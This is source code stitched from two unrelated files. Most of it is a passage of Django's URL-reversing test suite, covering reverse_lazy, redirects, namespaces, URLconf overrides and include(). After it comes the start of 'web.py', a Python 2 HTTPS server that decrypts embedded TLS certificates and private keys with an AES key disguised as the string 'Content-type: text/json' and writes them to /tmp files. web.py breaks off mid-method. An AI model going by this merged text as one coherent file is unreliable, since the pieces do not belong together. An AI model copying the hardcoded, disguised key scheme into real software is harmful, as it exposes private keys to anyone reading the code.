self.assertTrue(resolver._is_callback('urlpatterns_reverse.method_view_urls.ViewContainer.method_view'))
self.assertTrue(resolver._is_callback('urlpatterns_reverse.method_view_urls.ViewContainer.classmethod_view'))
def test_populate_concurrency(self):
"""
URLResolver._populate() can be called concurrently, but not more
than once per thread (#26888).
"""
resolver = URLResolver(RegexPattern(r'^/'), 'urlpatterns_reverse.urls')
resolver._local.populating = True
thread = threading.Thread(target=resolver._populate)
thread.start()
thread.join()
self.assertNotEqual(resolver._reverse_dict, {})
@override_settings(ROOT_URLCONF='urlpatterns_reverse.reverse_lazy_urls')
class ReverseLazyTest(TestCase):
def test_redirect_with_lazy_reverse(self):
response = self.client.get('/redirect/')
self.assertRedirects(response, "/redirected_to/", status_code=302)
def test_user_permission_with_lazy_reverse(self):
alfred = User.objects.create_user('alfred', 'alfred@example.com', password='testpw')
response = self.client.get('/login_required_view/')
self.assertRedirects(response, "/login/?next=/login_required_view/", status_code=302)
self.client.force_login(alfred)
response = self.client.get('/login_required_view/')
self.assertEqual(response.status_code, 200)
def test_inserting_reverse_lazy_into_string(self):
self.assertEqual(
'Some URL: %s' % reverse_lazy('some-login-page'),
'Some URL: /login/'
)
def test_build_absolute_uri(self):
factory = RequestFactory()
request = factory.get('/')
self.assertEqual(
request.build_absolute_uri(reverse_lazy('some-login-page')),
'http://testserver/login/',
)
class ReverseLazySettingsTest(AdminScriptTestCase):
"""
reverse_lazy can be used in settings without causing a circular
import error.
"""
def setUp(self):
super().setUp()
self.write_settings(
'settings.py',
extra="from django.urls import reverse_lazy\nLOGIN_URL = reverse_lazy('login')",
)
def test_lazy_in_settings(self):
out, err = self.run_manage(['check'])
self.assertNoOutput(err)
@override_settings(ROOT_URLCONF='urlpatterns_reverse.urls')
class ReverseShortcutTests(SimpleTestCase):
def test_redirect_to_object(self):
# We don't really need a model; just something with a get_absolute_url
class FakeObj:
def get_absolute_url(self):
return "/hi-there/"
res = redirect(FakeObj())
self.assertIsInstance(res, HttpResponseRedirect)
self.assertEqual(res.url, '/hi-there/')
res = redirect(FakeObj(), permanent=True)
self.assertIsInstance(res, HttpResponsePermanentRedirect)
self.assertEqual(res.url, '/hi-there/')
def test_redirect_to_view_name(self):
res = redirect('hardcoded2')
self.assertEqual(res.url, '/hardcoded/doc.pdf')
res = redirect('places', 1)
self.assertEqual(res.url, '/places/1/')
res = redirect('headlines', year='2008', month='02', day='17')
self.assertEqual(res.url, '/headlines/2008.02.17/')
with self.assertRaises(NoReverseMatch):
redirect('not-a-view')
def test_redirect_to_url(self):
res = redirect('/foo/')
self.assertEqual(res.url, '/foo/')
res = redirect('http://example.com/')
self.assertEqual(res.url, 'http://example.com/')
# Assert that we can redirect using UTF-8 strings
res = redirect('/æøå/abc/')
self.assertEqual(res.url, '/%C3%A6%C3%B8%C3%A5/abc/')
# Assert that no imports are attempted when dealing with a relative path
# (previously, the below would resolve in a UnicodeEncodeError from __import__ )
res = redirect('/æøå.abc/')
self.assertEqual(res.url, '/%C3%A6%C3%B8%C3%A5.abc/')
res = redirect('os.path')
self.assertEqual(res.url, 'os.path')
def test_no_illegal_imports(self):
# modules that are not listed in urlpatterns should not be importable
redirect("urlpatterns_reverse.nonimported_module.view")
self.assertNotIn("urlpatterns_reverse.nonimported_module", sys.modules)
def test_reverse_by_path_nested(self):
# Views added to urlpatterns using include() should be reversible.
from .views import nested_view
self.assertEqual(reverse(nested_view), '/includes/nested_path/')
def test_redirect_view_object(self):
from .views import absolute_kwargs_view
res = redirect(absolute_kwargs_view)
self.assertEqual(res.url, '/absolute_arg_view/')
with self.assertRaises(NoReverseMatch):
redirect(absolute_kwargs_view, wrong_argument=None)
@override_settings(ROOT_URLCONF='urlpatterns_reverse.namespace_urls')
class NamespaceTests(SimpleTestCase):
def test_ambiguous_object(self):
"""
Names deployed via dynamic URL objects that require namespaces can't
be resolved.
"""
test_urls = [
('urlobject-view', [], {}),
('urlobject-view', [37, 42], {}),
('urlobject-view', [], {'arg1': 42, 'arg2': 37}),
]
for name, args, kwargs in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs):
with self.assertRaises(NoReverseMatch):
reverse(name, args=args, kwargs=kwargs)
def test_ambiguous_urlpattern(self):
"""
Names deployed via dynamic URL objects that require namespaces can't
be resolved.
"""
test_urls = [
('inner-nothing', [], {}),
('inner-nothing', [37, 42], {}),
('inner-nothing', [], {'arg1': 42, 'arg2': 37}),
]
for name, args, kwargs in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs):
with self.assertRaises(NoReverseMatch):
reverse(name, args=args, kwargs=kwargs)
def test_non_existent_namespace(self):
"""Nonexistent namespaces raise errors."""
test_urls = [
'blahblah:urlobject-view',
'test-ns1:blahblah:urlobject-view',
]
for name in test_urls:
with self.subTest(name=name):
with self.assertRaises(NoReverseMatch):
reverse(name)
def test_normal_name(self):
"""Normal lookups work as expected."""
test_urls = [
('normal-view', [], {}, '/normal/'),
('normal-view', [37, 42], {}, '/normal/37/42/'),
('normal-view', [], {'arg1': 42, 'arg2': 37}, '/normal/42/37/'),
('special-view', [], {}, '/+%5C$*/'),
]
for name, args, kwargs, expected in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs):
self.assertEqual(reverse(name, args=args, kwargs=kwargs), expected)
def test_simple_included_name(self):
"""Normal lookups work on names included from other patterns."""
test_urls = [
('included_namespace_urls:inc-normal-view', [], {}, '/included/normal/'),
('included_namespace_urls:inc-normal-view', [37, 42], {}, '/included/normal/37/42/'),
('included_namespace_urls:inc-normal-view', [], {'arg1': 42, 'arg2': 37}, '/included/normal/42/37/'),
('included_namespace_urls:inc-special-view', [], {}, '/included/+%5C$*/'),
]
for name, args, kwargs, expected in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs):
self.assertEqual(reverse(name, args=args, kwargs=kwargs), expected)
def test_namespace_object(self):
"""Dynamic URL objects can be found using a namespace."""
test_urls = [
('test-ns1:urlobject-view', [], {}, '/test1/inner/'),
('test-ns1:urlobject-view', [37, 42], {}, '/test1/inner/37/42/'),
('test-ns1:urlobject-view', [], {'arg1': 42, 'arg2': 37}, '/test1/inner/42/37/'),
('test-ns1:urlobject-special-view', [], {}, '/test1/inner/+%5C$*/'),
]
for name, args, kwargs, expected in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs):
self.assertEqual(reverse(name, args=args, kwargs=kwargs), expected)
def test_app_object(self):
"""
Dynamic URL objects can return a (pattern, app_name) 2-tuple, and
include() can set the namespace.
"""
test_urls = [
('new-ns1:urlobject-view', [], {}, '/newapp1/inner/'),
('new-ns1:urlobject-view', [37, 42], {}, '/newapp1/inner/37/42/'),
('new-ns1:urlobject-view', [], {'arg1': 42, 'arg2': 37}, '/newapp1/inner/42/37/'),
('new-ns1:urlobject-special-view', [], {}, '/newapp1/inner/+%5C$*/'),
]
for name, args, kwargs, expected in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs):
self.assertEqual(reverse(name, args=args, kwargs=kwargs), expected)
def test_app_object_default_namespace(self):
"""
Namespace defaults to app_name when including a (pattern, app_name)
2-tuple.
"""
test_urls = [
('newapp:urlobject-view', [], {}, '/new-default/inner/'),
('newapp:urlobject-view', [37, 42], {}, '/new-default/inner/37/42/'),
('newapp:urlobject-view', [], {'arg1': 42, 'arg2': 37}, '/new-default/inner/42/37/'),
('newapp:urlobject-special-view', [], {}, '/new-default/inner/+%5C$*/'),
]
for name, args, kwargs, expected in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs):
self.assertEqual(reverse(name, args=args, kwargs=kwargs), expected)
def test_embedded_namespace_object(self):
"""Namespaces can be installed anywhere in the URL pattern tree."""
test_urls = [
('included_namespace_urls:test-ns3:urlobject-view', [], {}, '/included/test3/inner/'),
('included_namespace_urls:test-ns3:urlobject-view', [37, 42], {}, '/included/test3/inner/37/42/'),
(
'included_namespace_urls:test-ns3:urlobject-view', [], {'arg1': 42, 'arg2': 37},
'/included/test3/inner/42/37/',
),
('included_namespace_urls:test-ns3:urlobject-special-view', [], {}, '/included/test3/inner/+%5C$*/'),
]
for name, args, kwargs, expected in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs):
self.assertEqual(reverse(name, args=args, kwargs=kwargs), expected)
def test_namespace_pattern(self):
"""Namespaces can be applied to include()'d urlpatterns."""
test_urls = [
('inc-ns1:inc-normal-view', [], {}, '/ns-included1/normal/'),
('inc-ns1:inc-normal-view', [37, 42], {}, '/ns-included1/normal/37/42/'),
('inc-ns1:inc-normal-view', [], {'arg1': 42, 'arg2': 37}, '/ns-included1/normal/42/37/'),
('inc-ns1:inc-special-view', [], {}, '/ns-included1/+%5C$*/'),
]
for name, args, kwargs, expected in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs):
self.assertEqual(reverse(name, args=args, kwargs=kwargs), expected)
def test_app_name_pattern(self):
"""
Namespaces can be applied to include()'d urlpatterns that set an
app_name attribute.
"""
test_urls = [
('app-ns1:inc-normal-view', [], {}, '/app-included1/normal/'),
('app-ns1:inc-normal-view', [37, 42], {}, '/app-included1/normal/37/42/'),
('app-ns1:inc-normal-view', [], {'arg1': 42, 'arg2': 37}, '/app-included1/normal/42/37/'),
('app-ns1:inc-special-view', [], {}, '/app-included1/+%5C$*/'),
]
for name, args, kwargs, expected in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs):
self.assertEqual(reverse(name, args=args, kwargs=kwargs), expected)
def test_namespace_pattern_with_variable_prefix(self):
"""
Using include() with namespaces when there is a regex variable in front
of it.
"""
test_urls = [
('inc-outer:inc-normal-view', [], {'outer': 42}, '/ns-outer/42/normal/'),
('inc-outer:inc-normal-view', [42], {}, '/ns-outer/42/normal/'),
('inc-outer:inc-normal-view', [], {'arg1': 37, 'arg2': 4, 'outer': 42}, '/ns-outer/42/normal/37/4/'),
('inc-outer:inc-normal-view', [42, 37, 4], {}, '/ns-outer/42/normal/37/4/'),
('inc-outer:inc-special-view', [], {'outer': 42}, '/ns-outer/42/+%5C$*/'),
('inc-outer:inc-special-view', [42], {}, '/ns-outer/42/+%5C$*/'),
]
for name, args, kwargs, expected in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs):
self.assertEqual(reverse(name, args=args, kwargs=kwargs), expected)
def test_multiple_namespace_pattern(self):
"""Namespaces can be embedded."""
test_urls = [
('inc-ns1:test-ns3:urlobject-view', [], {}, '/ns-included1/test3/inner/'),
('inc-ns1:test-ns3:urlobject-view', [37, 42], {}, '/ns-included1/test3/inner/37/42/'),
(
'inc-ns1:test-ns3:urlobject-view', [], {'arg1': 42, 'arg2': 37},
'/ns-included1/test3/inner/42/37/',
),
('inc-ns1:test-ns3:urlobject-special-view', [], {}, '/ns-included1/test3/inner/+%5C$*/'),
]
for name, args, kwargs, expected in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs):
self.assertEqual(reverse(name, args=args, kwargs=kwargs), expected)
def test_nested_namespace_pattern(self):
"""Namespaces can be nested."""
test_urls = [
(
'inc-ns1:inc-ns4:inc-ns1:test-ns3:urlobject-view', [], {},
'/ns-included1/ns-included4/ns-included1/test3/inner/',
),
(
'inc-ns1:inc-ns4:inc-ns1:test-ns3:urlobject-view', [37, 42], {},
'/ns-included1/ns-included4/ns-included1/test3/inner/37/42/',
),
(
'inc-ns1:inc-ns4:inc-ns1:test-ns3:urlobject-view', [], {'arg1': 42, 'arg2': 37},
'/ns-included1/ns-included4/ns-included1/test3/inner/42/37/',
),
(
'inc-ns1:inc-ns4:inc-ns1:test-ns3:urlobject-special-view', [], {},
'/ns-included1/ns-included4/ns-included1/test3/inner/+%5C$*/',
),
]
for name, args, kwargs, expected in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs):
self.assertEqual(reverse(name, args=args, kwargs=kwargs), expected)
def test_app_lookup_object(self):
"""A default application namespace can be used for lookup."""
test_urls = [
('testapp:urlobject-view', [], {}, '/default/inner/'),
('testapp:urlobject-view', [37, 42], {}, '/default/inner/37/42/'),
('testapp:urlobject-view', [], {'arg1': 42, 'arg2': 37}, '/default/inner/42/37/'),
('testapp:urlobject-special-view', [], {}, '/default/inner/+%5C$*/'),
]
for name, args, kwargs, expected in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs):
self.assertEqual(reverse(name, args=args, kwargs=kwargs), expected)
def test_app_lookup_object_with_default(self):
"""A default application namespace is sensitive to the current app."""
test_urls = [
('testapp:urlobject-view', [], {}, 'test-ns3', '/default/inner/'),
('testapp:urlobject-view', [37, 42], {}, 'test-ns3', '/default/inner/37/42/'),
('testapp:urlobject-view', [], {'arg1': 42, 'arg2': 37}, 'test-ns3', '/default/inner/42/37/'),
('testapp:urlobject-special-view', [], {}, 'test-ns3', '/default/inner/+%5C$*/'),
]
for name, args, kwargs, current_app, expected in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs, current_app=current_app):
self.assertEqual(reverse(name, args=args, kwargs=kwargs, current_app=current_app), expected)
def test_app_lookup_object_without_default(self):
"""
An application namespace without a default is sensitive to the current
app.
"""
test_urls = [
('nodefault:urlobject-view', [], {}, None, '/other2/inner/'),
('nodefault:urlobject-view', [37, 42], {}, None, '/other2/inner/37/42/'),
('nodefault:urlobject-view', [], {'arg1': 42, 'arg2': 37}, None, '/other2/inner/42/37/'),
('nodefault:urlobject-special-view', [], {}, None, '/other2/inner/+%5C$*/'),
('nodefault:urlobject-view', [], {}, 'other-ns1', '/other1/inner/'),
('nodefault:urlobject-view', [37, 42], {}, 'other-ns1', '/other1/inner/37/42/'),
('nodefault:urlobject-view', [], {'arg1': 42, 'arg2': 37}, 'other-ns1', '/other1/inner/42/37/'),
('nodefault:urlobject-special-view', [], {}, 'other-ns1', '/other1/inner/+%5C$*/'),
]
for name, args, kwargs, current_app, expected in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs, current_app=current_app):
self.assertEqual(reverse(name, args=args, kwargs=kwargs, current_app=current_app), expected)
def test_special_chars_namespace(self):
test_urls = [
('special:included_namespace_urls:inc-normal-view', [], {}, '/+%5C$*/included/normal/'),
('special:included_namespace_urls:inc-normal-view', [37, 42], {}, '/+%5C$*/included/normal/37/42/'),
(
'special:included_namespace_urls:inc-normal-view', [], {'arg1': 42, 'arg2': 37},
'/+%5C$*/included/normal/42/37/',
),
('special:included_namespace_urls:inc-special-view', [], {}, '/+%5C$*/included/+%5C$*/'),
]
for name, args, kwargs, expected in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs):
self.assertEqual(reverse(name, args=args, kwargs=kwargs), expected)
def test_namespaces_with_variables(self):
"""Namespace prefixes can capture variables."""
test_urls = [
('inc-ns5:inner-nothing', [], {'outer': '70'}, '/inc70/'),
('inc-ns5:inner-extra', [], {'extra': 'foobar', 'outer': '78'}, '/inc78/extra/foobar/'),
('inc-ns5:inner-nothing', ['70'], {}, '/inc70/'),
('inc-ns5:inner-extra', ['78', 'foobar'], {}, '/inc78/extra/foobar/'),
]
for name, args, kwargs, expected in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs):
self.assertEqual(reverse(name, args=args, kwargs=kwargs), expected)
def test_nested_app_lookup(self):
"""
A nested current_app should be split in individual namespaces (#24904).
"""
test_urls = [
('inc-ns1:testapp:urlobject-view', [], {}, None, '/ns-included1/test4/inner/'),
('inc-ns1:testapp:urlobject-view', [37, 42], {}, None, '/ns-included1/test4/inner/37/42/'),
('inc-ns1:testapp:urlobject-view', [], {'arg1': 42, 'arg2': 37}, None, '/ns-included1/test4/inner/42/37/'),
('inc-ns1:testapp:urlobject-special-view', [], {}, None, '/ns-included1/test4/inner/+%5C$*/'),
('inc-ns1:testapp:urlobject-view', [], {}, 'inc-ns1:test-ns3', '/ns-included1/test3/inner/'),
('inc-ns1:testapp:urlobject-view', [37, 42], {}, 'inc-ns1:test-ns3', '/ns-included1/test3/inner/37/42/'),
(
'inc-ns1:testapp:urlobject-view', [], {'arg1': 42, 'arg2': 37}, 'inc-ns1:test-ns3',
'/ns-included1/test3/inner/42/37/',
),
(
'inc-ns1:testapp:urlobject-special-view', [], {}, 'inc-ns1:test-ns3',
'/ns-included1/test3/inner/+%5C$*/',
),
]
for name, args, kwargs, current_app, expected in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs, current_app=current_app):
self.assertEqual(reverse(name, args=args, kwargs=kwargs, current_app=current_app), expected)
def test_current_app_no_partial_match(self):
"""current_app shouldn't be used unless it matches the whole path."""
test_urls = [
('inc-ns1:testapp:urlobject-view', [], {}, 'nonexistent:test-ns3', '/ns-included1/test4/inner/'),
(
'inc-ns1:testapp:urlobject-view', [37, 42], {}, 'nonexistent:test-ns3',
'/ns-included1/test4/inner/37/42/',
),
(
'inc-ns1:testapp:urlobject-view', [], {'arg1': 42, 'arg2': 37}, 'nonexistent:test-ns3',
'/ns-included1/test4/inner/42/37/',
),
(
'inc-ns1:testapp:urlobject-special-view', [], {}, 'nonexistent:test-ns3',
'/ns-included1/test4/inner/+%5C$*/',
),
]
for name, args, kwargs, current_app, expected in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs, current_app=current_app):
self.assertEqual(reverse(name, args=args, kwargs=kwargs, current_app=current_app), expected)
@override_settings(ROOT_URLCONF=urlconf_outer.__name__)
class RequestURLconfTests(SimpleTestCase):
def test_urlconf(self):
response = self.client.get('/test/me/')
self.assertEqual(response.status_code, 200)
self.assertEqual(response.content, b'outer:/test/me/,inner:/inner_urlconf/second_test/')
response = self.client.get('/inner_urlconf/second_test/')
self.assertEqual(response.status_code, 200)
response = self.client.get('/second_test/')
self.assertEqual(response.status_code, 404)
@override_settings(
MIDDLEWARE=[
'%s.ChangeURLconfMiddleware' % middleware.__name__,
]
)
def test_urlconf_overridden(self):
response = self.client.get('/test/me/')
self.assertEqual(response.status_code, 404)
response = self.client.get('/inner_urlconf/second_test/')
self.assertEqual(response.status_code, 404)
response = self.client.get('/second_test/')
self.assertEqual(response.status_code, 200)
self.assertEqual(response.content, b'outer:,inner:/second_test/')
@override_settings(
MIDDLEWARE=[
'%s.NullChangeURLconfMiddleware' % middleware.__name__,
]
)
def test_urlconf_overridden_with_null(self):
"""
Overriding request.urlconf with None will fall back to the default
URLconf.
"""
response = self.client.get('/test/me/')
self.assertEqual(response.status_code, 200)
self.assertEqual(response.content, b'outer:/test/me/,inner:/inner_urlconf/second_test/')
response = self.client.get('/inner_urlconf/second_test/')
self.assertEqual(response.status_code, 200)
response = self.client.get('/second_test/')
self.assertEqual(response.status_code, 404)
@override_settings(
MIDDLEWARE=[
'%s.ChangeURLconfMiddleware' % middleware.__name__,
'%s.ReverseInnerInResponseMiddleware' % middleware.__name__,
]
)
def test_reverse_inner_in_response_middleware(self):
"""
Test reversing an URL from the *overridden* URLconf from inside
a response middleware.
"""
response = self.client.get('/second_test/')
self.assertEqual(response.status_code, 200)
self.assertEqual(response.content, b'/second_test/')
@override_settings(
MIDDLEWARE=[
'%s.ChangeURLconfMiddleware' % middleware.__name__,
'%s.ReverseOuterInResponseMiddleware' % middleware.__name__,
]
)
def test_reverse_outer_in_response_middleware(self):
"""
Test reversing an URL from the *default* URLconf from inside
a response middleware.
"""
msg = (
"Reverse for 'outer' not found. 'outer' is not a valid view "
"function or pattern name."
)
with self.assertRaisesMessage(NoReverseMatch, msg):
self.client.get('/second_test/')
@override_settings(
MIDDLEWARE=[
'%s.ChangeURLconfMiddleware' % middleware.__name__,
'%s.ReverseInnerInStreaming' % middleware.__name__,
]
)
def test_reverse_inner_in_streaming(self):
"""
Test reversing an URL from the *overridden* URLconf from inside
a streaming response.
"""
response = self.client.get('/second_test/')
self.assertEqual(response.status_code, 200)
self.assertEqual(b''.join(response), b'/second_test/')
@override_settings(
MIDDLEWARE=[
'%s.ChangeURLconfMiddleware' % middleware.__name__,
'%s.ReverseOuterInStreaming' % middleware.__name__,
]
)
def test_reverse_outer_in_streaming(self):
"""
Test reversing an URL from the *default* URLconf from inside
a streaming response.
"""
message = "Reverse for 'outer' not found."
with self.assertRaisesMessage(NoReverseMatch, message):
self.client.get('/second_test/')
b''.join(self.client.get('/second_test/'))
def test_urlconf_is_reset_after_request(self):
"""The URLconf is reset after each request."""
self.assertIsNone(get_urlconf())
with override_settings(MIDDLEWARE=['%s.ChangeURLconfMiddleware' % middleware.__name__]):
self.client.get(reverse('inner'))
self.assertIsNone(get_urlconf())
class ErrorHandlerResolutionTests(SimpleTestCase):
"""Tests for handler400, handler404 and handler500"""
def setUp(self):
urlconf = 'urlpatterns_reverse.urls_error_handlers'
urlconf_callables = 'urlpatterns_reverse.urls_error_handlers_callables'
self.resolver = URLResolver(RegexPattern(r'^$'), urlconf)
self.callable_resolver = URLResolver(RegexPattern(r'^$'), urlconf_callables)
def test_named_handlers(self):
for code in [400, 404, 500]:
with self.subTest(code=code):
self.assertEqual(self.resolver.resolve_error_handler(code), empty_view)
def test_callable_handlers(self):
for code in [400, 404, 500]:
with self.subTest(code=code):
self.assertEqual(self.callable_resolver.resolve_error_handler(code), empty_view)
@override_settings(ROOT_URLCONF='urlpatterns_reverse.urls_without_handlers')
class DefaultErrorHandlerTests(SimpleTestCase):
def test_default_handler(self):
"If the urls.py doesn't specify handlers, the defaults are used"
response = self.client.get('/test/')
self.assertEqual(response.status_code, 404)
msg = "I don't think I'm getting good value for this view"
with self.assertRaisesMessage(ValueError, msg):
self.client.get('/bad_view/')
@override_settings(ROOT_URLCONF=None)
class NoRootUrlConfTests(SimpleTestCase):
"""Tests for handler404 and handler500 if ROOT_URLCONF is None"""
def test_no_handler_exception(self):
msg = (
"The included URLconf 'None' does not appear to have any patterns "
"in it. If you see the 'urlpatterns' variable with valid patterns "
"in the file then the issue is probably caused by a circular "
"import."
)
with self.assertRaisesMessage(ImproperlyConfigured, msg):
self.client.get('/test/me/')
@override_settings(ROOT_URLCONF='urlpatterns_reverse.namespace_urls')
class ResolverMatchTests(SimpleTestCase):
def test_urlpattern_resolve(self):
for path_, url_name, app_name, namespace, view_name, func, args, kwargs in resolve_test_data:
with self.subTest(path=path_):
# Legacy support for extracting "function, args, kwargs".
match_func, match_args, match_kwargs = resolve(path_)
self.assertEqual(match_func, func)
self.assertEqual(match_args, args)
self.assertEqual(match_kwargs, kwargs)
# ResolverMatch capabilities.
match = resolve(path_)
self.assertEqual(match.__class__, ResolverMatch)
self.assertEqual(match.url_name, url_name)
self.assertEqual(match.app_name, app_name)
self.assertEqual(match.namespace, namespace)
self.assertEqual(match.view_name, view_name)
self.assertEqual(match.func, func)
self.assertEqual(match.args, args)
self.assertEqual(match.kwargs, kwargs)
# and for legacy purposes:
self.assertEqual(match[0], func)
self.assertEqual(match[1], args)
self.assertEqual(match[2], kwargs)
def test_resolver_match_on_request(self):
response = self.client.get('/resolver_match/')
resolver_match = response.resolver_match
self.assertEqual(resolver_match.url_name, 'test-resolver-match')
def test_resolver_match_on_request_before_resolution(self):
request = HttpRequest()
self.assertIsNone(request.resolver_match)
def test_repr(self):
self.assertEqual(
repr(resolve('/no_kwargs/42/37/')),
"ResolverMatch(func=urlpatterns_reverse.views.empty_view, "
"args=('42', '37'), kwargs={}, url_name='no-kwargs', app_names=[], "
"namespaces=[], route='^no_kwargs/([0-9]+)/([0-9]+)/$')",
)
@override_settings(ROOT_URLCONF='urlpatterns_reverse.urls')
def test_repr_functools_partial(self):
tests = [
('partial', 'template.html'),
('partial_nested', 'nested_partial.html'),
('partial_wrapped', 'template.html'),
]
for name, template_name in tests:
with self.subTest(name=name):
func = (
f"functools.partial({views.empty_view!r}, "
f"template_name='{template_name}')"
)
self.assertEqual(
repr(resolve(f'/{name}/')),
f"ResolverMatch(func={func}, args=(), kwargs={{}}, "
f"url_name='{name}', app_names=[], namespaces=[], "
f"route='{name}/')",
)
@override_settings(ROOT_URLCONF='urlpatterns_reverse.erroneous_urls')
class ErroneousViewTests(SimpleTestCase):
def test_noncallable_view(self):
# View is not a callable (explicit import; arbitrary Python object)
with self.assertRaisesMessage(TypeError, 'view must be a callable'):
path('uncallable-object/', views.uncallable)
def test_invalid_regex(self):
# Regex contains an error (refs #6170)
msg = '(regex_error/$" is not a valid regular expression'
with self.assertRaisesMessage(ImproperlyConfigured, msg):
reverse(views.empty_view)
class ViewLoadingTests(SimpleTestCase):
def test_view_loading(self):
self.assertEqual(get_callable('urlpatterns_reverse.views.empty_view'), empty_view)
self.assertEqual(get_callable(empty_view), empty_view)
def test_view_does_not_exist(self):
msg = "View does not exist in module urlpatterns_reverse.views."
with self.assertRaisesMessage(ViewDoesNotExist, msg):
get_callable('urlpatterns_reverse.views.i_should_not_exist')
def test_attributeerror_not_hidden(self):
msg = 'I am here to confuse django.urls.get_callable'
with self.assertRaisesMessage(AttributeError, msg):
get_callable('urlpatterns_reverse.views_broken.i_am_broken')
def test_non_string_value(self):
msg = "'1' is not a callable or a dot-notation path"
with self.assertRaisesMessage(ViewDoesNotExist, msg):
get_callable(1)
def test_string_without_dot(self):
msg = "Could not import 'test'. The path must be fully qualified."
with self.assertRaisesMessage(ImportError, msg):
get_callable('test')
def test_module_does_not_exist(self):
with self.assertRaisesMessage(ImportError, "No module named 'foo'"):
get_callable('foo.bar')
def test_parent_module_does_not_exist(self):
msg = 'Parent module urlpatterns_reverse.foo does not exist.'
with self.assertRaisesMessage(ViewDoesNotExist, msg):
get_callable('urlpatterns_reverse.foo.bar')
def test_not_callable(self):
msg = (
"Could not import 'urlpatterns_reverse.tests.resolve_test_data'. "
"View is not callable."
)
with self.assertRaisesMessage(ViewDoesNotExist, msg):
get_callable('urlpatterns_reverse.tests.resolve_test_data')
class IncludeTests(SimpleTestCase):
url_patterns = [
path('inner/', views.empty_view, name='urlobject-view'),
re_path(r'^inner/(?P<arg1>[0-9]+)/(?P<arg2>[0-9]+)/$', views.empty_view, name='urlobject-view'),
re_path(r'^inner/\+\\\$\*/$', views.empty_view, name='urlobject-special-view'),
]
app_urls = URLObject('inc-app')
def test_include_urls(self):
self.assertEqual(include(self.url_patterns), (self.url_patterns, None, None))
def test_include_namespace(self):
msg = (
'Specifying a namespace in include() without providing an '
'app_name is not supported.'
)
with self.assertRaisesMessage(ImproperlyConfigured, msg):
include(self.url_patterns, 'namespace')
def test_include_4_tuple(self):
msg = 'Passing a 4-tuple to include() is not supported.'
with self.assertRaisesMessage(ImproperlyConfigured, msg):
include((self.url_patterns, 'app_name', 'namespace', 'blah'))
def test_include_3_tuple(self):
msg = 'Passing a 3-tuple to include() is not supported.'
with self.assertRaisesMessage(ImproperlyConfigured, msg):
include((self.url_patterns, 'app_name', 'namespace'))
def test_include_3_tuple_namespace(self):
msg = 'Cannot override the namespace for a dynamic module that provides a namespace.'
with self.assertRaisesMessage(ImproperlyConfigured, msg):
include((self.url_patterns, 'app_name', 'namespace'), 'namespace')
def test_include_2_tuple(self):
self.assertEqual(
include((self.url_patterns, 'app_name')),
(self.url_patterns, 'app_name', 'app_name')
)
def test_include_2_tuple_namespace(self):
self.assertEqual(
include((self.url_patterns, 'app_name'), namespace='namespace'),
(self.url_patterns, 'app_name', 'namespace')
)
def test_include_app_name(self):
self.assertEqual(
include(self.app_urls),
(self.app_urls, 'inc-app', 'inc-app')
)
def test_include_app_name_namespace(self):
self.assertEqual(
include(self.app_urls, 'namespace'),
(self.app_urls, 'inc-app', 'namespace')
)
@override_settings(ROOT_URLCONF='urlpatterns_reverse.urls')
class LookaheadTests(SimpleTestCase):
def test_valid_resolve(self):
test_urls = [
'/lookahead-/a-city/',
'/lookbehind-/a-city/',
'/lookahead+/a-city/',
'/lookbehind+/a-city/',
]
for test_url in test_urls:
with self.subTest(url=test_url):
self.assertEqual(resolve(test_url).kwargs, {'city': 'a-city'})
def test_invalid_resolve(self):
test_urls = [
'/lookahead-/not-a-city/',
'/lookbehind-/not-a-city/',
'/lookahead+/other-city/',
'/lookbehind+/other-city/',
]
for test_url in test_urls:
with self.subTest(url=test_url):
with self.assertRaises(Resolver404):
resolve(test_url)
def test_valid_reverse(self):
test_urls = [
('lookahead-positive', {'city': 'a-city'}, '/lookahead+/a-city/'),
('lookahead-negative', {'city': 'a-city'}, '/lookahead-/a-city/'),
('lookbehind-positive', {'city': 'a-city'}, '/lookbehind+/a-city/'),
('lookbehind-negative', {'city': 'a-city'}, '/lookbehind-/a-city/'),
]
for name, kwargs, expected in test_urls:
with self.subTest(name=name, kwargs=kwargs):
self.assertEqual(reverse(name, kwargs=kwargs), expected)
def test_invalid_reverse(self):
test_urls = [
('lookahead-positive', {'city': 'other-city'}),
('lookahead-negative', {'city': 'not-a-city'}),
('lookbehind-positive', {'city': 'other-city'}),
('lookbehind-negative', {'city': 'not-a-city'}),
]
for name, kwargs in test_urls:
with self.subTest(name=name, kwargs=kwargs):
with self.assertRaises(NoReverseMatch):
reverse(name, kwargs=kwargs)
|
web.py
|
import BaseHTTPServer, SimpleHTTPServer
import ssl
import tempfile
import os
import AESCipher
import mycerts
import threading
import time
from urlparse import urlparse, parse_qs
import json
import subprocess
aes = AESCipher.AESCipher('Content-type: text/json') # Guess what's this? :-)
server_crt_file = tempfile.NamedTemporaryFile(dir="/tmp", delete=True)
server_crt_file.write(aes.decrypt(mycerts.server_crt))
server_crt_file.flush()
server_key_file = tempfile.NamedTemporaryFile(dir="/tmp", delete=True)
server_key_file.write(aes.decrypt(mycerts.server_key))
server_key_file.flush()
client_list_file = tempfile.NamedTemporaryFile(dir="/tmp", delete=True)
client_list_file.write(aes.decrypt(mycerts.client_list_crt))
client_list_file.flush()
globs = {}
class WebServer(BaseHTTPServer.BaseHTTPRequestHandler, object):
def _set_headers(self):
self.send_response(200)
self.send_header('Content-type', 'application/json')
self.end_headers()
def _handle_input(self):
self._who = "local"
self._ip = self.client_address[0]
if hasattr(self.connection, 'getpeercert'):
self._who = self.connection.getpeercert()['subject'][3][0][1]
